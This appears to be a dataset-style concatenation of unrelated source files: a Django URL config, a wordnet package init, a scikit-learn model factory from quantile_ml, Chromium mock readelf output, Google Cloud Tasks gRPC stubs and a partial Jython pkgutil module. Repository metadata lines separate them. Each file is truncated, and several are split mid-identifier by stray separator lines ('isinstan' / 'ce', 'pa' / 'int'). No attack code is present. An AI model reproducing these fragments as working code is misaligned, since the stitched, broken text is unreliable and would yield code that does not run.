# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from django.conf import settings
from django.conf.urls import patterns, include, url
from django.views.generic import TemplateView
from whisk_tutorial import views
# Route the site root to the tutorial homepage view.
urlpatterns = patterns('',
    url(r'^$', views.homepage, name="home"),
)

# With DEBUG off, Django's dev server stops serving static assets on its
# own, so an explicit static route over STATIC_ROOT is appended here.
# NOTE(review): serving statics through Django is a dev-only convenience;
# production normally delegates STATIC_ROOT to the web server/CDN.
if settings.DEBUG is False: #if DEBUG is True it will be served automatically
    print("In URLS - Debug False")
    urlpatterns += patterns('',
        url(r'^static/(?P<path>.*)$', 'django.views.static.serve', {'document_root': settings.STATIC_ROOT}),
    )
|
anuragkumarak95/wordnet
|
wordnet/bin/__init__.py
|
Python
|
gpl-3.0
| 90
| 0.011111
|
# Author Anurag Kumar 12 Sept, 2017
#init file for t
|
his module..
from .paint import pa
|
int
|
doordash/auto_ml
|
quantile_ml/utils_models.py
|
Python
|
mit
| 24,465
| 0.002984
|
import dill
import os
import sys
from quantile_ml import utils_categorical_ensembling
from sklearn.ensemble import RandomForestClassifier, RandomForestRegressor, ExtraTreesRegressor, AdaBoostRegressor, GradientBoostingRegressor, GradientBoostingClassifier, ExtraTreesClassifier, AdaBoostClassifier
from sklearn.linear_model import RandomizedLasso, RandomizedLogisticRegression, RANSACRegressor, LinearRegression, Ridge, Lasso, ElasticNet, LassoLars, OrthogonalMatchingPursuit, BayesianRidge, ARDRegression, SGDRegressor, PassiveAggressiveRegressor, LogisticRegression, RidgeClassifier, SGDClassifier, Perceptron, PassiveAggressiveClassifier
from sklearn.cluster import MiniBatchKMeans
xgb_installed = False
try:
from xgboost import XGBClassifier, XGBRegressor
xgb_installed = True
except ImportError:
pass
lgb_installed = False
try:
from lightgbm import LGBMRegressor, LGBMClassifier
lgb_installed = True
except ImportError:
pass
# Note: it's important that importing tensorflow come last. We can run into OpenCL issues if we import it ahead of some other packages. At the moment, it's a known behavior with tensorflow, but everyone's ok with this workaround.
keras_installed = False
try:
# Suppress some level of logs
os.environ['TF_CPP_MIN_VLOG_LEVEL'] = '3'
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
from tensorflow import logging
logging.set_verbosity(logging.INFO)
from keras.constraints import maxnorm
from keras.layers import Dense, Dropout
from keras.layers.advanced_activations import LeakyReLU, PReLU
from keras.models import Sequential
from keras.models import load_model as keras_load_model
from keras import regularizers
from keras.wrappers.scikit_learn import KerasRegressor, KerasClassifier
keras_installed = True
except ImportError as e:
print('error importing keras')
print(e)
pass
from quantile_ml import utils
def get_model_from_name(model_name, training_params=None):
    """Instantiate the estimator registered under `model_name`.

    Stock hyperparameters for the name are merged with (and overridden by)
    any user-supplied `training_params`, then applied via set_params().
    Raises KeyError when the name is unknown or its backing library was not
    importable at module load time.
    """
    # For Keras
    epochs = 250
    # Environment variables are strings, hence the comparison against 'True'.
    if os.environ.get('is_test_suite', 0) == 'True' and model_name[:12] == 'DeepLearning':
        print('Heard that this is the test suite. Limiting number of epochs, which will increase training speed dramatically at the expense of model accuracy')
        epochs = 30
    # Stock defaults per model name; unknown names simply get no defaults.
    all_model_params = {
        'LogisticRegression': {'n_jobs': -2},
        'RandomForestClassifier': {'n_jobs': -2},
        'ExtraTreesClassifier': {'n_jobs': -1},
        'AdaBoostClassifier': {'n_estimators': 10},
        'SGDClassifier': {'n_jobs': -1},
        'Perceptron': {'n_jobs': -1},
        'LinearRegression': {'n_jobs': -2},
        'RandomForestRegressor': {'n_jobs': -2},
        'ExtraTreesRegressor': {'n_jobs': -1},
        'MiniBatchKMeans': {'n_clusters': 8},
        'GradientBoostingRegressor': {'presort': False},
        'SGDRegressor': {'shuffle': False},
        'PassiveAggressiveRegressor': {'shuffle': False},
        'AdaBoostRegressor': {'n_estimators': 10},
        'XGBRegressor': {'nthread':-1, 'n_estimators': 200},
        'XGBClassifier': {'nthread':-1, 'n_estimators': 200},
        'LGBMRegressor': {},
        'LGBMClassifier': {},
        'DeepLearningRegressor': {'epochs': epochs, 'batch_size': 50, 'verbose': 2},
        'DeepLearningClassifier': {'epochs': epochs, 'batch_size': 50, 'verbose': 2}
    }
    model_params = all_model_params.get(model_name, None)
    if model_params is None:
        model_params = {}
    if training_params is not None:
        print('Now using the model training_params that you passed in:')
        print(training_params)
        # Overwrite our stock params with what the user passes in (i.e., if the user wants 10,000 trees, we will let them do it)
        model_params.update(training_params)
        print('After overwriting our defaults with your values, here are the final params that will be used to initialize the model:')
        print(model_params)
    # Fresh instances for every always-available estimator; optional-library
    # entries are added below only when their import guard succeeded.
    model_map = {
        # Classifiers
        'LogisticRegression': LogisticRegression(),
        'RandomForestClassifier': RandomForestClassifier(),
        'RidgeClassifier': RidgeClassifier(),
        'GradientBoostingClassifier': GradientBoostingClassifier(),
        'ExtraTreesClassifier': ExtraTreesClassifier(),
        'AdaBoostClassifier': AdaBoostClassifier(),
        'SGDClassifier': SGDClassifier(),
        'Perceptron': Perceptron(),
        'PassiveAggressiveClassifier': PassiveAggressiveClassifier(),
        # Regressors
        'LinearRegression': LinearRegression(),
        'RandomForestRegressor': RandomForestRegressor(),
        'Ridge': Ridge(),
        'ExtraTreesRegressor': ExtraTreesRegressor(),
        'AdaBoostRegressor': AdaBoostRegressor(),
        'RANSACRegressor': RANSACRegressor(),
        'GradientBoostingRegressor': GradientBoostingRegressor(),
        'Lasso': Lasso(),
        'ElasticNet': ElasticNet(),
        'LassoLars': LassoLars(),
        'OrthogonalMatchingPursuit': OrthogonalMatchingPursuit(),
        'BayesianRidge': BayesianRidge(),
        'ARDRegression': ARDRegression(),
        'SGDRegressor': SGDRegressor(),
        'PassiveAggressiveRegressor': PassiveAggressiveRegressor(),
        # Clustering
        'MiniBatchKMeans': MiniBatchKMeans()
    }
    if xgb_installed:
        model_map['XGBClassifier'] = XGBClassifier()
        model_map['XGBRegressor'] = XGBRegressor()
    if lgb_installed:
        model_map['LGBMRegressor'] = LGBMRegressor()
        model_map['LGBMClassifier'] = LGBMClassifier()
    if keras_installed:
        model_map['DeepLearningClassifier'] = KerasClassifier(build_fn=make_deep_learning_classifier)
        model_map['DeepLearningRegressor'] = KerasRegressor(build_fn=make_deep_learning_model)
    try:
        model_without_params = model_map[model_name]
    except KeyError as e:
        print('It appears you are trying to use a library that is not available when we try to import it, or using a value for model_names that we do not recognize')
        raise(e)
    # set_params returns the same estimator, now carrying the merged params.
    model_with_params = model_without_params.set_params(**model_params)
    return model_with_params
def get_name_from_model(model):
if isinstance
|
(model, LogisticRegression):
return 'LogisticRegression'
if isinstance(model, RandomForestClassifier):
return 'RandomForestClassifier'
if isinstance(model, RidgeClassifier):
return 'RidgeClassifier'
if isinstance(model, GradientBoostingClassifier):
return 'GradientBoostingClassifier'
if isinstan
|
ce(model, ExtraTreesClassifier):
return 'ExtraTreesClassifier'
if isinstance(model, AdaBoostClassifier):
return 'AdaBoostClassifier'
if isinstance(model, SGDClassifier):
return 'SGDClassifier'
if isinstance(model, Perceptron):
return 'Perceptron'
if isinstance(model, PassiveAggressiveClassifier):
return 'PassiveAggressiveClassifier'
if isinstance(model, LinearRegression):
return 'LinearRegression'
if isinstance(model, RandomForestRegressor):
return 'RandomForestRegressor'
if isinstance(model, Ridge):
return 'Ridge'
if isinstance(model, ExtraTreesRegressor):
return 'ExtraTreesRegressor'
if isinstance(model, AdaBoostRegressor):
return 'AdaBoostRegressor'
if isinstance(model, RANSACRegressor):
return 'RANSACRegressor'
if isinstance(model, GradientBoostingRegressor):
return 'GradientBoostingRegressor'
if isinstance(model, Lasso):
return 'Lasso'
if isinstance(model, ElasticNet):
return 'ElasticNet'
if isinstance(model, LassoLars):
return 'LassoLars'
if isinstance(model, OrthogonalMatchingPursuit):
return 'OrthogonalMatchingPursuit'
if isinstance(model, BayesianRidge):
return 'BayesianRidge'
if isinstance(model, ARDRegression):
return 'ARDRegression'
if isinstance(model, SGDRegressor):
return 'SGDRegressor'
if isinstance(model, PassiveAggressiveRegressor):
return 'PassiveAggressiveRegressor'
if isinstance(model, MiniBatchKMeans):
return 'MiniBatchKMeans'
if xgb_installed:
if isinstance(mod
|
scheib/chromium
|
tools/binary_size/libsupersize/testdata/mock_toolchain/mock_readelf.py
|
Python
|
bsd-3-clause
| 11,261
| 0.007459
|
# Copyright 2017 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
import sys
_HEADERS = """ELF Header:
Magic: 7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00
Class: ELF32
Data: 2's complement, little endian
Version: 1 (current)
OS/ABI: UNIX - System V
ABI Version: 0
Type: DYN (Shared object file)
Machine: ARM
Version: 0x1
Entry point address: 0x0
Start of program headers: 52 (bytes into file)
Start of section headers: 628588000 (bytes into file)
Flags: 0x5000200, Version5 EABI, soft-float ABI
Size of this header: 52 (bytes)
Size of program headers: 32 (bytes)
Number of program headers: 9
Size of section headers: 40 (bytes)
Number of section headers: 40
Section header string table index: 39
"""
_SECTIONS = """There are 40 section headers, starting at offset 0x25777de0:
Section Headers:
[Nr] Name Type Addr Off Size ES Flg Lk Inf Al
[ 0] NULL 00000000 000000 000000 00 0 0 0
[ 1] .interp PROGBITS 00000154 000154 000013 00 A 0 0 1
[ 2] .note.gnu.build-id NOTE 00000168 000168 000024 00 A 0 0 4
[ 3] .dynsym DYNSYM 0000018c 00018c 001960 10 A 4 1 4
[ 4] .dynstr STRTAB 00001b0c 001b0c 000fb9 00 A 0 0 1
[ 5] .hash HASH 00002ad4 002ad4 000a7c 04 A 3 0 4
[ 6] .gnu.version VERSYM 00003558 003558 00032c 02 A 3 0 2
[ 7] .gnu.version_d VERDEF 00003888 003888 00001c 00 A 4 1 4
[ 8] .gnu.version_r VERNEED 000038a4 0038a4 000060 00 A 4 3 4
[ 9] .rel.dyn REL 00003904 003904 288498 08 A 3 0 4
[10] .rel.plt REL 0029fbec 29fbec 000b00 08 A 3 0 4
[11] .plt PROGBITS 002a06ec 2a06ec 001094 00 AX 0 0 4
[12] .text PROGBITS 0028d900 28d900 2250ba8 00 AX 0 0 64
[13] .rodata PROGBITS 0266e5f0 000084 5a72e4 00 A 0 0 256
[14] .ARM.exidx ARM_EXIDX 02bd3d10 2bd3d10 1771c8 08 AL 12 0 4
[15] .ARM.extab PROGBITS 02bd5858 2bd5858 02cd50 00 A 0 0 4
[16] .data.rel
|
.ro
|
.local PROGBITS 02c176f0 2c166f0 0c0e08 00 WA 0 0 16
[17] .data.rel.ro PROGBITS 02cd8500 2cd8500 104108 00 WA 0 0 16
[18] .init_array INIT_ARRAY 02ddc608 2ddc608 000008 00 WA 0 0 4
[19] .fini_array FINI_ARRAY 02ddc6f4 2ddc6f4 000008 00 WA 0 0 4
[20] .dynamic DYNAMIC 02ddc6fc 2ddc6fc 000130 08 WA 4 0 4
[21] .got PROGBITS 02ddc834 2ddc834 00a7cc 00 WA 0 0 4
[22] .data PROGBITS 02de7000 2de7000 018d88 00 WA 0 0 32
[23] .bss NOBITS 02dffda0 2dffda0 13d7e8 00 WA 0 0 32
[35] .note.gnu.gold-version NOTE 00000000 22700c98 00001c 00 0 0 4
[36] .ARM.attributes ARM_ATTRIBUTES 00000000 22700cb4 00003c 00 0 0 1
[37] .symtab SYMTAB 00000000 22700cf0 105ef20 10 38 901679 4
[38] .strtab STRTAB 00000000 234c4950 213a4fe 00 0 0 1
[39] .shstrtab STRTAB 00000000 257b46da 0001b4 00 0 0 1
Key to Flags:
W (write), A (alloc), X (execute), M (merge), S (strings)
I (info), L (link order), G (group), T (TLS), E (exclude), x (unknown)
O (extra OS processing required) o (OS specific), p (processor specific)
"""
_NOTES = """
Displaying notes found at file offset 0x00000168 with length 0x00000024:
Owner Data size\tDescription
GNU 0x00000014\tNT_GNU_BUILD_ID (unique build ID bitstring)
Build ID: WhatAnAmazingBuildId
Displaying notes found at file offset 0x226c41e8 with length 0x0000001c:
Owner Data size\tDescription
GNU 0x00000009\tNT_GNU_GOLD_VERSION (gold version)
"""
_OBJECT_OUTPUTS = {
'obj/third_party/icu/icuuc/ucnv_ext.o': """\
There are 71 section headers, starting at offset 0x3114:
Section Headers:
[Nr] Name Type Addr Off Size ES Flg Lk Inf Al
[ 0] NULL 00000000 000000 000000 00 0 0 0
[ 1] .strtab STRTAB 00000000 0029ac 000765 00 0 0 1
[ 2] .text PROGBITS 00000000 000034 000000 00 AX 0 0 4
[ 3] .text.ucnv_extIni PROGBITS 00000000 000034 0000c6 00 AX 0 0 2
[ 4] .rel.text.ucnv_ex REL 00000000 0023f4 000010 08 70 3 4
[ 5] .ARM.exidx.text.u ARM_EXIDX 00000000 0000fc 000008 00 AL 3 0 4
[60] .rodata.str1.1 PROGBITS 00000000 000015 000015 01 AMS 0 0 1
[56] .debug_str PROGBITS 00000000 000c50 0003c5 01 MS 0 0 1
[57] .debug_abbrev PROGBITS 00000000 001015 0000a1 00 0 0 1
[58] .debug_info PROGBITS 00000000 0010b6 000151 00 0 0 1
[59] .rel.debug_info REL 00000000 002544 0001e8 08 70 58 4
[60] .debug_ranges PROGBITS 00000000 001207 0000b0 00 0 0 1
[61] .rel.debug_ranges REL 00000000 00272c 000130 08 70 60 4
[62] .debug_macinfo PROGBITS 00000000 0012b7 000001 00 0 0 1
[63] .comment PROGBITS 00000000 0012b8 000024 01 MS 0 0 1
[64] .note.GNU-stack PROGBITS 00000000 0012dc 000000 00 0 0 1
[65] .ARM.attributes ARM_ATTRIBUTES 00000000 0012dc 00003c 00 0 0 1
[66] .debug_frame PROGBITS 00000000 001318 0001e4 00 0 0 4
[67] .rel.debug_frame REL 00000000 00285c 0000e0 08 70 66 4
[68] .debug_line PROGBITS 00000000 0014fc 000965 00 0 0 1
[69] .rel.debug_line REL 00000000 00293c 000070 08 70 68 4
[70] .symtab SYMTAB 00000000 001e64 000590 10 1 74 4
Key to Flags:
W (write), A (alloc), X (execute), M (merge), S (strings)
I (info), L (link order), G (group), T (TLS), E (exclude), x (unknown)
O (extra OS processing required) o (OS specific), p (processor specific)
""",
'obj/third_party/WebKit.a': """\
File: obj/third_party/WebKit.a(PaintChunker.o)
There are 68 section headers, starting at offset 0x5650:
Section Headers:
[Nr] Name Type Addr Off Size ES Flg Lk Inf Al
[ 0] NULL 00000000 000000 000000 00 0 0 0
Key to Flags:
W (write), A (alloc), X (execute), M (merge), S (strings)
I (info), L (link order), G (group), T (TLS), E (exclude), x (unknown)
O (extra OS processing required) o (OS specific), p (processor specific)
File: obj/third_party/WebKit.a(ContiguousContainer.o)
There are 68 section headers, starting at offset 0x5650:
Section Headers:
[Nr] Name Type Addr Off Size ES Flg Lk Inf Al
[ 0] NULL 00000000 000000 000000 00 0 0 0
Key to Flags:
W (write), A (alloc), X (execute), M (merge), S (strings)
I (info), L (link order), G (group), T (TLS), E (exclude), x (unknown)
O (extra OS processing required) o (OS specific), p (processor specific)
""",
'obj/base/base/page_allocator.o': """\
There are 68 section headers, starting at offset 0x5650:
Section Headers:
[Nr] Name Type Addr Off Size ES Flg Lk Inf Al
[ 0] NULL 00000000 000000 000000 00 0 0 0
[ 1] .rodata.str1.1 PROGBITS 00000000 000015 000005 01 AMS 0 0 1
""",
'obj/third_party/ffmpeg/libffmpeg_internal.a': """\
File: obj/third_party/ffmpeg/libffmpeg_internal.a(fft_float.o)
There are 68 section heade
|
tseaver/google-cloud-python
|
tasks/google/cloud/tasks_v2beta2/proto/cloudtasks_pb2_grpc.py
|
Python
|
apache-2.0
| 29,408
| 0.00374
|
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
import grpc
from google.cloud.tasks_v2beta2.proto import (
cloudtasks_pb2 as google_dot_cloud_dot_tasks__v2beta2_dot_proto_dot_cloudtasks__pb2,
)
from google.cloud.tasks_v2beta2.proto import (
queue_pb2 as google_dot_cloud_dot_tasks__v2beta2_dot_proto_dot_queue__pb2,
)
from google.cloud.tasks_v2beta2.proto import (
task_pb2 as google_dot_cloud_dot_tasks__v2beta2_dot_proto_dot_task__pb2,
)
from google.iam.v1 import iam_policy_pb2 as google_dot_iam_dot_v1_dot_iam__policy__pb2
from google.iam.v1 import policy_pb2 as google_dot_iam_dot_v1_dot_policy__pb2
from google.protobuf import empty_pb2 as google_dot_protobuf_dot_empty__pb2
class CloudTasksStub(object):
"""Cloud Tasks allows developers to manage the execution of background
work in their applications.
"""
def __init__(
|
self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.ListQueues = channel.unary_unary(
"/google.cloud.tasks.v2beta2.CloudTasks/ListQueues",
request_serializer=google_dot_cloud_dot_tasks__v2beta2_dot_proto_dot_cloudtasks__pb2.ListQueuesRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_tasks__v2beta2_dot_proto_dot_cloudtasks__pb2.ListQueuesResponse.FromString,
)
|
self.GetQueue = channel.unary_unary(
"/google.cloud.tasks.v2beta2.CloudTasks/GetQueue",
request_serializer=google_dot_cloud_dot_tasks__v2beta2_dot_proto_dot_cloudtasks__pb2.GetQueueRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_tasks__v2beta2_dot_proto_dot_queue__pb2.Queue.FromString,
)
self.CreateQueue = channel.unary_unary(
"/google.cloud.tasks.v2beta2.CloudTasks/CreateQueue",
request_serializer=google_dot_cloud_dot_tasks__v2beta2_dot_proto_dot_cloudtasks__pb2.CreateQueueRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_tasks__v2beta2_dot_proto_dot_queue__pb2.Queue.FromString,
)
self.UpdateQueue = channel.unary_unary(
"/google.cloud.tasks.v2beta2.CloudTasks/UpdateQueue",
request_serializer=google_dot_cloud_dot_tasks__v2beta2_dot_proto_dot_cloudtasks__pb2.UpdateQueueRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_tasks__v2beta2_dot_proto_dot_queue__pb2.Queue.FromString,
)
self.DeleteQueue = channel.unary_unary(
"/google.cloud.tasks.v2beta2.CloudTasks/DeleteQueue",
request_serializer=google_dot_cloud_dot_tasks__v2beta2_dot_proto_dot_cloudtasks__pb2.DeleteQueueRequest.SerializeToString,
response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
self.PurgeQueue = channel.unary_unary(
"/google.cloud.tasks.v2beta2.CloudTasks/PurgeQueue",
request_serializer=google_dot_cloud_dot_tasks__v2beta2_dot_proto_dot_cloudtasks__pb2.PurgeQueueRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_tasks__v2beta2_dot_proto_dot_queue__pb2.Queue.FromString,
)
self.PauseQueue = channel.unary_unary(
"/google.cloud.tasks.v2beta2.CloudTasks/PauseQueue",
request_serializer=google_dot_cloud_dot_tasks__v2beta2_dot_proto_dot_cloudtasks__pb2.PauseQueueRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_tasks__v2beta2_dot_proto_dot_queue__pb2.Queue.FromString,
)
self.ResumeQueue = channel.unary_unary(
"/google.cloud.tasks.v2beta2.CloudTasks/ResumeQueue",
request_serializer=google_dot_cloud_dot_tasks__v2beta2_dot_proto_dot_cloudtasks__pb2.ResumeQueueRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_tasks__v2beta2_dot_proto_dot_queue__pb2.Queue.FromString,
)
self.GetIamPolicy = channel.unary_unary(
"/google.cloud.tasks.v2beta2.CloudTasks/GetIamPolicy",
request_serializer=google_dot_iam_dot_v1_dot_iam__policy__pb2.GetIamPolicyRequest.SerializeToString,
response_deserializer=google_dot_iam_dot_v1_dot_policy__pb2.Policy.FromString,
)
self.SetIamPolicy = channel.unary_unary(
"/google.cloud.tasks.v2beta2.CloudTasks/SetIamPolicy",
request_serializer=google_dot_iam_dot_v1_dot_iam__policy__pb2.SetIamPolicyRequest.SerializeToString,
response_deserializer=google_dot_iam_dot_v1_dot_policy__pb2.Policy.FromString,
)
self.TestIamPermissions = channel.unary_unary(
"/google.cloud.tasks.v2beta2.CloudTasks/TestIamPermissions",
request_serializer=google_dot_iam_dot_v1_dot_iam__policy__pb2.TestIamPermissionsRequest.SerializeToString,
response_deserializer=google_dot_iam_dot_v1_dot_iam__policy__pb2.TestIamPermissionsResponse.FromString,
)
self.ListTasks = channel.unary_unary(
"/google.cloud.tasks.v2beta2.CloudTasks/ListTasks",
request_serializer=google_dot_cloud_dot_tasks__v2beta2_dot_proto_dot_cloudtasks__pb2.ListTasksRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_tasks__v2beta2_dot_proto_dot_cloudtasks__pb2.ListTasksResponse.FromString,
)
self.GetTask = channel.unary_unary(
"/google.cloud.tasks.v2beta2.CloudTasks/GetTask",
request_serializer=google_dot_cloud_dot_tasks__v2beta2_dot_proto_dot_cloudtasks__pb2.GetTaskRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_tasks__v2beta2_dot_proto_dot_task__pb2.Task.FromString,
)
self.CreateTask = channel.unary_unary(
"/google.cloud.tasks.v2beta2.CloudTasks/CreateTask",
request_serializer=google_dot_cloud_dot_tasks__v2beta2_dot_proto_dot_cloudtasks__pb2.CreateTaskRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_tasks__v2beta2_dot_proto_dot_task__pb2.Task.FromString,
)
self.DeleteTask = channel.unary_unary(
"/google.cloud.tasks.v2beta2.CloudTasks/DeleteTask",
request_serializer=google_dot_cloud_dot_tasks__v2beta2_dot_proto_dot_cloudtasks__pb2.DeleteTaskRequest.SerializeToString,
response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
self.LeaseTasks = channel.unary_unary(
"/google.cloud.tasks.v2beta2.CloudTasks/LeaseTasks",
request_serializer=google_dot_cloud_dot_tasks__v2beta2_dot_proto_dot_cloudtasks__pb2.LeaseTasksRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_tasks__v2beta2_dot_proto_dot_cloudtasks__pb2.LeaseTasksResponse.FromString,
)
self.AcknowledgeTask = channel.unary_unary(
"/google.cloud.tasks.v2beta2.CloudTasks/AcknowledgeTask",
request_serializer=google_dot_cloud_dot_tasks__v2beta2_dot_proto_dot_cloudtasks__pb2.AcknowledgeTaskRequest.SerializeToString,
response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
self.RenewLease = channel.unary_unary(
"/google.cloud.tasks.v2beta2.CloudTasks/RenewLease",
request_serializer=google_dot_cloud_dot_tasks__v2beta2_dot_proto_dot_cloudtasks__pb2.RenewLeaseRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_tasks__v2beta2_dot_proto_dot_task__pb2.Task.FromString,
)
self.CancelLease = channel.unary_unary(
"/google.cloud.tasks.v2beta2.CloudTasks/CancelLease",
request_serializer=google_dot_cloud_dot_tasks__v2beta2_dot_proto_dot_cloudtasks__pb2.CancelLeaseRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_tasks__v2beta2_dot_proto_dot_task__pb2.Task.FromString,
)
self.RunTask = channel.unary_unary(
"/google.cloud.tasks.v2beta2.CloudTasks/RunTask",
request_serializer=google_dot_cloud_dot_tasks__v2beta2_dot_proto_dot_cloudtasks__pb2.RunTaskRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_tasks
|
zephyrplugins/zephyr
|
zephyr.plugin.jython/jython2.5.2rc3/Lib/pkgutil.py
|
Python
|
epl-1.0
| 19,027
| 0.001314
|
"""Utilities to support packages."""
# NOTE: This module must remain compatible with Python 2.3, as it is shared
# by setuptools for distribution with Python 2.3 and up.
import os
import sys
import imp
import os.path
from types import ModuleType
from org.python.core import imp as _imp, BytecodeLoader
__all__ = [
'get_importer', 'iter_importers', 'get_loader', 'find_loader',
'walk_packages', 'iter_modules',
'ImpImporter', 'ImpLoader', 'read_code', 'extend_path',
]
# equivalent to CPythonLib's pkgutil.read_code except that we need
# diff args to pass into our underlying imp implementation, as
# accessed by _imp here
def read_jython_code(fullname, file, filename):
    """Read compiled bytecode for `fullname` from an open file (Jython).

    Delegates to Jython's imp.readCode and wraps the raw bytes with
    BytecodeLoader so they behave like a Python code object.
    """
    data = _imp.readCode(filename, file, False)
    # "$py" matches Jython's naming convention for compiled module classes.
    return BytecodeLoader.makeCode(fullname + "$py", data, filename)
def simplegeneric(func):
    """Make a trivial single-dispatch generic function"""
    # Maps a class to the implementation registered for it.
    registry = {}

    def wrapper(*args, **kw):
        # Dispatch on the dynamic class of the first positional argument,
        # walking its MRO for the most specific registered implementation.
        target = args[0]
        try:
            klass = target.__class__
        except AttributeError:
            klass = type(target)
        try:
            lookup_order = klass.__mro__
        except AttributeError:
            # Classic (old-style) class: derive a new-style subclass just to
            # borrow its MRO, then drop the synthetic subclass itself.
            try:
                class klass(klass, object):
                    pass
                lookup_order = klass.__mro__[1:]
            except TypeError:
                # must be an ExtensionClass or some such :(
                lookup_order = (object,)
        for candidate in lookup_order:
            if candidate in registry:
                return registry[candidate](*args, **kw)
        return func(*args, **kw)

    try:
        wrapper.__name__ = func.__name__
    except (TypeError, AttributeError):
        pass    # Python 2.3 doesn't allow functions to be renamed

    def register(typ, func=None):
        # Usable directly -- g.register(T, impl) -- or as @g.register(T).
        if func is None:
            return lambda f: register(typ, f)
        registry[typ] = func
        return func

    wrapper.__dict__ = func.__dict__
    wrapper.__doc__ = func.__doc__
    wrapper.register = register
    return wrapper
def walk_packages(path=None, prefix='', onerror=None):
    """Yield (module_loader, name, ispkg) for all modules recursively on path.

    If path is None, every accessible module is reported.  'prefix' is
    prepended to every yielded module name.  Packages (only packages, not
    plain modules) are imported so their __path__ can be recursed into.

    'onerror', when given, is called with the failing package name for any
    exception raised during that import; without it, ImportError is ignored
    and any other exception propagates, ending the walk.
    """
    seen_paths = {}

    def already_seen(p):
        # Per-invocation memo so the same path entry is only walked once.
        if p in seen_paths:
            return True
        seen_paths[p] = True

    for importer, name, ispkg in iter_modules(path, prefix):
        yield importer, name, ispkg

        if not ispkg:
            continue
        try:
            __import__(name)
        except ImportError:
            if onerror is not None:
                onerror(name)
        except Exception:
            if onerror is not None:
                onerror(name)
            else:
                raise
        else:
            subpath = getattr(sys.modules[name], '__path__', None) or []
            # don't traverse path items we've seen before
            subpath = [p for p in subpath if not already_seen(p)]
            for item in walk_packages(subpath, name + '.', onerror):
                yield item
def iter_modules(path=None, prefix=''):
    """Yield (module_loader, name, ispkg) for all submodules on path.

    If path is None, all top-level modules on sys.path are reported.
    'prefix' is prepended to every yielded module name.  Each name is
    yielded at most once, from the first importer that provides it.
    """
    if path is None:
        sources = iter_importers()
    else:
        sources = map(get_importer, path)
    seen = {}
    for importer in sources:
        for modname, is_package in iter_importer_modules(importer, prefix):
            if modname in seen:
                continue
            seen[modname] = 1
            yield importer, modname, is_package
#@simplegeneric
def iter_importer_modules(importer, prefix=''):
    # Default implementation for the generic: delegate to the importer's own
    # iter_modules() when it has one, otherwise report nothing.
    if hasattr(importer, 'iter_modules'):
        return importer.iter_modules(prefix)
    return []

# Turn the default into a per-importer-type dispatch point.
iter_importer_modules = simplegeneric(iter_importer_modules)
class ImpImporter:
    """PEP 302 Importer that wraps Python's "classic" import algorithm

    ImpImporter(dirname) produces a PEP 302 importer that searches that
    directory.  ImpImporter(None) produces a PEP 302 importer that searches
    the current sys.path, plus any modules that are frozen or built-in.

    Note that ImpImporter does not currently support being used by placement
    on sys.meta_path.
    """

    def __init__(self, path=None):
        # path: directory to search, or None for the default search space.
        self.path = path

    def find_module(self, fullname, path=None):
        """Return an ImpLoader for `fullname`, or None if it cannot be found."""
        # Note: we ignore 'path' argument since it is only used via meta_path
        subname = fullname.split(".")[-1]
        # A dotted name can only be resolved relative to a concrete directory.
        if subname != fullname and self.path is None:
            return None
        if self.path is None:
            path = None
        else:
            path = [os.path.realpath(self.path)]
        try:
            file, filename, etc = imp.find_module(subname, path)
        except ImportError:
            return None
        return ImpLoader(fullname, file, filename, etc)

    def iter_modules(self, prefix=''):
        """Yield (name, ispkg) for every module/package directly in self.path."""
        if self.path is None or not os.path.isdir(self.path):
            return

        yielded = {}
        import inspect

        filenames = os.listdir(self.path)
        filenames.sort() # handle packages before same-named modules

        for fn in filenames:
            modname = inspect.getmodulename(fn)
            if modname=='__init__' or modname in yielded:
                continue

            path = os.path.join(self.path, fn)
            ispkg = False

            # A plain, dotless directory counts as a package only when it
            # contains an __init__ module.
            if not modname and os.path.isdir(path) and '.' not in fn:
                modname = fn
                for fn in os.listdir(path):
                    subname = inspect.getmodulename(fn)
                    if subname=='__init__':
                        ispkg = True
                        break
                else:
                    continue    # not a package

            if modname and '.' not in modname:
                yielded[modname] = 1
                yield prefix + modname, ispkg
class ImpLoader:
"""PEP 302 Loader that wraps Python's "classic" import algorithm
"""
code = source = None
    def __init__(self, fullname, file, filename, etc):
        # `etc` is the (suffix, mode, type) triple from imp.find_module();
        # `file` may be an already-open handle onto `filename`.
        self.file = file
        self.filename = filename
        self.fullname = fullname
        self.etc = etc
    def load_module(self, fullname):
        """Import and return the module, closing the backing file afterwards."""
        self._reopen()
        try:
            mod = imp.load_module(fullname, self.file, self.filename, self.etc)
        finally:
            if self.file:
                self.file.close()
        # Note: we don't set __loader__ because we want the module to look
        # normal; i.e. this is just a wrapper for standard import machinery
        return mod
    def get_data(self, pathname):
        """Return the raw bytes of the file at `pathname` (PEP 302 loader API)."""
        f = open(pathname, "rb")
        try:
            return f.read()
        finally:
            f.close()
    def _reopen(self):
        # Re-open self.file if a previous load closed it; the open mode is
        # chosen from the module type recorded by imp.find_module().
        if self.file and self.file.closed:
            mod_type = self.etc[2]
            if mod_type==imp.PY_SOURCE:
                self.file = open(self.filename, 'rU')
            elif mod_type in (imp.PY_COMPILED, imp.C_EXTENSION):
                self.file = open(self.filename, 'rb')
def _fix_name(self, fullname):
if fullname is None:
